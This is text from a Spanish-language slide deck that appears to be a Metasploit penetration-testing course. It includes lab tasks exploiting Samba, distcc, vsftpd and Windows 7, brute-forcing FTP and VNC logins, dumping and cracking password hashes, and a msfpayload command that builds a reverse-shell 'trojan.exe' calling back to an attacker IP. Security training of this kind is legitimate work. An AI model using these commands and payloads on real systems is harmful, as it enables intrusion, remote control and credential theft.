Audit | Tax | Advisory 1

MetaSploit
Conceptos basicos:

FrameWork: En el desarrollo de software, un Framework es una

estructura de soporte definida en la cual otro proyecto de software puede
ser organizado y desarrollado. Tipicamente,un framework puede incluir
soporte de programas, librerias y un lenguaje de scripting entre otros
software para ayudar a desarrollar y unir los diferentes componentes de un
proyecto.
Exploit: Exploit (viene de to exploit - aprovechar) - cdigo escrito con el fin
de aprovechar un error de programacin para obtener diversos privilegios
Shell: Parte fundamental de un sistema operativo encargada de ejecutar
las rdenes bsicas para el manejo del sistema. Tambin se denomina
Shell. Suelen incorporar caractersticas tales como control de procesos,
redireccin de entrada/salida y un lenguaje de rdenes para escribir
programas por lotes o (scripts).
Audit | Tax | Advisory 2

1
MetaSploit
explicare los mas comunes.
win32_adduser: agregara un usuario(con permisos elevados) al
sistema que nos penetremos
win32_bind_vncinject: nos mostrara la pantalla del usuario con la
cual podemos manejar y controlar su equipo remotamente (un VNC).
win32_downloadexec: Descargara un archivo de algun servidor web
o ftp y lo ejecutara(entre ellos puede estar troyanos ).
win32_exec: Ejecutara un comando especificado por ti en la variable
CMD.
win32_reverse: Mi favorita. Nos dar una shell inversa por si tiene
firewall y no podemos abrir puertos.
win32_reverse_vncinject:Nos dar un VNC inverso por si tiene
firewall y no podemos abrir puertos.

Audit | Tax | Advisory 3

MetaSploit
recomiendo que solo rellenen las variables que digan required ya que
las
opcionales son para opciones mas avanzadas, aqu solo nos esta pidiendo
RHOST (host que atacaremos) y RPORT (puerto por el que se conectara),
nos puede pedir mas LHOST y LPORT (para conexiones inversas son el
host y el puerto que estar esperando la conexin para dar darle ordenes
en este caso tu IP y un puerto disponible de tu maquina), las dems
opciones las puedes llenar intuitivamente dependiendo del
exploit, ataque y etc que seleccionaste, para ir rellenando casa variable:
set [Variable] [Valor]
set RHOST IPVIctima
set RPORT PuertoDeLaVictima
en este caso RPORT tiene un valor por defaul como se ve en la imagen
(135) este no lo cambien a menos que sea necesario (que la victima tenga
el servicio en otro puerto).Una vez rellenadas todas las variables, solo
queda poner el comando:
exploit
Audit | Tax | Advisory 4

2
MetaSploit
Resumen:

Use module empezar usando un modulo.

Show options- mostrar las diferentes opciones configurables
Set nombre del variable valor- set option
Exploit- explotacion
Run- ejecucion
Help commando ayuda sobre un commando

Audit | Tax | Advisory 5

MetaSploit
Ejemplo:

Exploit netapi contra windows

Audit | Tax | Advisory 6

3
Explotando java
Tarea:
Lanzar exploit java_rmi_server contra servidor linux

Audit | Tax | Advisory 7

En este ataque realizarnos ataque de diccionario contra el servicio

Vnc en puerto TCP 5900 .
Usar el ataque auxiliary/scanner/vnc/vnc_login
Cuando se encuntrala contrasea usar vncviewer.

Audit | Tax | Advisory 8

4
Exploits:
Tarea:
Lanzar exploit distcc_exec contra el mismo IP

Lanzar exploit vsftpd

Audit | Tax | Advisory 9

Hacking servicio samba

Tarea:
Usar el exploit usermap_script cotra el servidor virtual.
Configurar payload cmd/unix/reverse
Ejecutar y poner la session en el background (ctrl Z)
Depsues ejecutar modulo post/linux/gather/hashdump para capturar los
hashes
Ejecutar John para relevar los hashes

Audit | Tax | Advisory 10

10

5
Usando John

Audit | Tax | Advisory 11

11

Hacking servicio samba

Tarea:
Usar el exploit usermap_script cotra el servidor virtual.
Configurar payload cmd/unix/reverse
Ejecutar y poner la session en el background (ctrl Z)
Depsues ejecutar modulo post/linux/gather/hashdump para capturar los
hashes
Ejecutar John para relevar los hashes

Audit | Tax | Advisory 12

12

6
Hacking Windows 7
Demostracion

exploit/windows/browser/ms10_046_shortcut_icon_dllloader

#msf > set payload windows/meterpreter/reverse_tcp

#msf > set SRVHOST local ip

#msf > set LHOST local ip

exploit

Audit | Tax | Advisory 13

13

Ataque fuerza bruta servicio FTP

1.Escanear la red interna y encontrar servicio FTP abierto (tcp21)
2.Dento msf usar el modulo auxiliary/scanner/ftp/ftp_login para realizar un
ataque fuerza bruta.

Audit | Tax | Advisory 14

14

7
Ataque fuerza bruta servicio FTP
Resolucin:
1.En MSF use auxiliary/scanner/ftp/ftp_login
2.set RHOSTS ip_servidor_ftp
3.set PASS_FILE /pentest/passwords/wordlists/rockyou.txt
4.set USER_FILE /pentest/passwords/wordlists/users.txt
5.Run

Audit | Tax | Advisory 15

15

Ataque fuerza bruta servicio FTP

Usando Hydra para realizar un ataque diccionario a servicio ftp:

Audit | Tax | Advisory 16

16

8
Explotacion!
El commando show payload nos permite verlos diferentes payloads que le
podemos enviar con el exploit, MSF mostrara solo los payloads compatibles
con el exploit.

Ahoraingresamosset payload windows/shell/reverse_tcppara

Seleccionar unaconexion reversa y nuevamenteShow options

Audit | Tax | Advisory 17

17

Buscando puertos de salida para el envio de

Shell remoto

Audit | Tax | Advisory 18

18

9
Audit | Tax | Advisory 19

19

Audit | Tax | Advisory 20

20

10
Audit | Tax | Advisory 21

21

Audit | Tax | Advisory 22

22

11
Crear un payload

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=6666 x > ~/Desktop/trojan.exe

Usar exploit/multi/handler

Audit | Tax | Advisory 23

23

SET

Demo Hacking Windows 7

Audit | Tax | Advisory 24

24

12